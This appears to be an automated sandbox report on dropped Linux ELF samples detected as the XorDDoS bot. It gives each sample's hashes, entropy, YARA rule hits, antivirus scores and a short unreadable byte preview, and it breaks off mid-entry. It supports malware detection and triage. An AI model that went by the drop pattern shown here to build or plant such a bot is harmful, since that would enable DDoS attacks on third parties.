                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.1975908595683995
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojL:/fUywKQ7Fb1pNL/p52fjQn36EuL
                                                                              MD5:F0744C231FD483B8E536ADAAE22FED9C
                                                                              SHA1:FE5563A0C88FED80ED4678281E62B3140E030531
                                                                              SHA-256:BB376E55F703FC68B2CA6A2DBB508C26E8F9CF7AAFCE4B5DF808AF4E54716A3C
                                                                              SHA-512:D5416BB30EAEDF53A0F7BAC8BA77FC83A4B03857B5F6780955A38A4DE54A82DDD087033C6DF529CF2920A27368BE34FA787E928EFEF291BA0B0D7CF82D5940BD
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/dthtwwmqvu, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/dthtwwmqvu, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/dthtwwmqvu, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/dthtwwmqvu, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197580278571238
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoj2:/fUywKQ7Fb1pNL/p52fjQn36Eu2
                                                                              MD5:4BB785727D658C24555AFB2552203824
                                                                              SHA1:FFAF01EB7B0FAD14E7DE427D32FC38CC73E68A73
                                                                              SHA-256:06E6F11DEFFE5489E98F507605B0EE2721235D1A7EED4DB5C92E8DC0A60908D7
                                                                              SHA-512:09D2B6ED940088674F94EB1511623F4963659CB1F8916130D50B2604914CC80AFE052AA15E75AFDBDB95FD2890002D733778DCD98C0BA34C9486588412B3FDC1
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eqoogeqyds, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eqoogeqyds, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eqoogeqyds, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eqoogeqyds, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197578026577081
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoja:/fUywKQ7Fb1pNL/p52fjQn36Eua
                                                                              MD5:32BAEF41BEF86E657CECB26BA601C8FD
                                                                              SHA1:A611883DFC4DADE5097D2F52FDB266ABCB6288AF
                                                                              SHA-256:38FF5CC3275A442B6D8CE21CBF370603723E7E9F0C02DCC92EBD584F53B5398B
                                                                              SHA-512:A93645C459157DE53EC3696BA32FA0BE2012BDD6ACA54C2175288A48DA91860C91D7146BE448FA89FCF280F6EBE4D1D269A42609A5CB2AAF0F76D987A33EDFA9
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gphlkawhxw, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/gphlkawhxw, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/gphlkawhxw, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/gphlkawhxw, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.19758381336493
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojC:/fUywKQ7Fb1pNL/p52fjQn36EuC
                                                                              MD5:874925F3383CF4D89CFB331D6357DCC4
                                                                              SHA1:FBBC07B5494EA0A561F980B908FBB817706BA112
                                                                              SHA-256:3E418FEFF6FD38021395689440775591D1BCFFADC5EF2B857F4BB677C0394490
                                                                              SHA-512:B709F9A1219C604303D6F9422E3A05F4F78B9FE7F44D16C047F2C23730B219F78D229C48AE854991FC612243C26F940411647219EDE5E7D5046AFB7C4AA61B64
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/jeyjdycnpv, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/jeyjdycnpv, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/jeyjdycnpv, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/jeyjdycnpv, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197589033594373
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojd:/fUywKQ7Fb1pNL/p52fjQn36Eud
                                                                              MD5:C2BE7F6F3D8A2DD22BB027877353C35F
                                                                              SHA1:D6EE5D2C4F1F43FC4AC528CA6C7BE18A8F31BA20
                                                                              SHA-256:9C7B85C4A23EA601F88FABE4D6B022D50AC2397209641EF276D81EFD93334437
                                                                              SHA-512:B6FFFC8E99608B7B239B6100B277C2983F4AD50FCC592E30F102CA38AA1999FB31701B56123541699155505C64DECD2CEE1B078183DC738C0474DEEB1AECB39C
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ksagqhmoao, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ksagqhmoao, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ksagqhmoao, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ksagqhmoao, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197581226504545
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojW:/fUywKQ7Fb1pNL/p52fjQn36EuW
                                                                              MD5:62C3A5BB687FBBF7C6618BEA4DAADF29
                                                                              SHA1:A6B5249BF5F26E8A7A1DA8A286B390FDA6A39BC8
                                                                              SHA-256:C474CECF57E197A9730CB9F9185A9F3D04771C99DF5E8012298C783161E6BB97
                                                                              SHA-512:A61F7C48EC52C72B7862491A90A678211A433D675943DE6841F5B075FBB67523ABCA9E30C2014A01403F5D0623F39DA0D2C7B4C0E264E09F802B301B93C21649
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/oigyzaiygp, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/oigyzaiygp, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/oigyzaiygp, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/oigyzaiygp, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197589598922325
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojr:/fUywKQ7Fb1pNL/p52fjQn36Eur
                                                                              MD5:3CAB282FBF544A8C5DA93E8A6E8649D0
                                                                              SHA1:A104019BC2AFFB758BE6B0C9F733F04E95CAEBDA
                                                                              SHA-256:999853E6BE27F095C714AB01E8286DAB4EA5276F21A67519AF2F5C0E372D2A0A
                                                                              SHA-512:23CBE46CBBA20E17573C380A4484EEC311B6314CFFA4B0ADF13712974F0C2D2F232CAC3496EF5C2450F1230371FE7D36A81396FE005844101958F6534139B508
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/otlzwyqefc, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/otlzwyqefc, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/otlzwyqefc, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/otlzwyqefc, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197579258712602
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojK:/fUywKQ7Fb1pNL/p52fjQn36EuK
                                                                              MD5:D660D3565AA30310004C75F37E3FE19F
                                                                              SHA1:16A029E2EF90AFCF69676D287AAAC14E4842C839
                                                                              SHA-256:D9F3D7442F5CB981EE8E01661428E0758C16A269972799DBCE4517983E8865FC
                                                                              SHA-512:043F81708E19A45D97C7EBC107660F915BF9902ACD52ADB166A783038E6144438C2C95593D8939330E32426BA435BE21CBD0E59E5AD98287FB109B45CC5AA35C
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qxzsiorokf, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/qxzsiorokf, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/qxzsiorokf, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qxzsiorokf, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, missing section headers at 548576
                                                                              Category:dropped
                                                                              Size (bytes):438272
                                                                              Entropy (8bit):6.3524887571064825
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266y2:/fUywKQ7Fb1pNL/p52V
                                                                              MD5:25B252EE7BFAE0248F71E5221681034A
                                                                              SHA1:E64273B283B275E65632F805B5A93F6C25081DFD
                                                                              SHA-256:1FD26806B5A1E1D931D7B232A98898DA41841CC0F58CA935A1696340E877D018
                                                                              SHA-512:4E585485BD324A1458828EDE496B4A728A5B84D5AD80A8DBCF4388353763EA4A40CF640A547E0CBA90AA381A13B40AEBAE1957728DC749A8B4A92C8785C6212F
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/snluqxjnyb, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/snluqxjnyb, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/snluqxjnyb, Author: unknown
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 46%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197593359466777
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojd:/fUywKQ7Fb1pNL/p52fjQn36Eud
                                                                              MD5:01FD1F9249B1844A8C8D2D32CEDC38B7
                                                                              SHA1:C4DA5B557072F6341872355B1D814E03B430B284
                                                                              SHA-256:AA621DBF0813B1C6EE4A740B9FC686B17F976E4FFCA8574C17765E7E531A1B51
                                                                              SHA-512:F1907933428C703BD57734393D348A5C598A1A26502F2B511C19F3FCB0D0CD82CA95957DBB65BCC4F3C295818130768773DD7BAE80208B68B4FA9A82AD28506F
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/sosfbbrzmx, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/sosfbbrzmx, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/sosfbbrzmx, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/sosfbbrzmx, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197573820318344
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojZ:/fUywKQ7Fb1pNL/p52fjQn36EuZ
                                                                              MD5:9D2BE3B2E820CF7206AAD0DC28D827DD
                                                                              SHA1:7F21E8E2FA8159E8E74BF86C22CBEB8022D60109
                                                                              SHA-256:261352A336A63FBF91AEB7B07635073338B83B7CBC3517644E1199150B68FCDC
                                                                              SHA-512:FE5E42603CC98FFC9872146949F87F1375610150AFA5A7FA1886EAD80918EC8E8573AD15AAA5CDD48DC58F15613BB5CFD4559CC352657BC0474C6684AF9E3FBF
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uhjkqkcgma, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/uhjkqkcgma, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/uhjkqkcgma, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uhjkqkcgma, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.1975864637530895
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojl:/fUywKQ7Fb1pNL/p52fjQn36Eul
                                                                              MD5:53241E7C3D48F7919DC80796D016A705
                                                                              SHA1:D13C397C47B9FA887342211477283A9B65304B55
                                                                              SHA-256:951EB9A2E1B13BF7F3CCB79C0AA8291A9BBC09CC031009505EB7D58BA796682E
                                                                              SHA-512:E33ADC8156162F4C2CADEE3F6B48049BE9A67C1C1AC9B036D2B46AAC7F34A807E91992198CFA0D9676F3E76BB5BA88773C5AD925371A6578D9AE2459A503642C
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uzqdvpyngy, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/uzqdvpyngy, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/uzqdvpyngy, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uzqdvpyngy, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197596303234039
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojT:/fUywKQ7Fb1pNL/p52fjQn36EuT
                                                                              MD5:F0F21DF0836E951D36BB440812753052
                                                                              SHA1:92751A7027898887FCA72DDC5049C51D7DBBD69F
                                                                              SHA-256:ED5EFF7DE47308606D30B57E460C78F47E831CE54A62497C18F2622454C059A0
                                                                              SHA-512:C10E657BBE5328046D05F793846A28A3F18009466E8E5DF5072F54A0F2AC98A7257C076013D9B0DD741736AEAFD8A2705957D1B6E27A90C735319AF791A6DFF9
                                                                              Malicious:true
                                                                              Yara Hits:
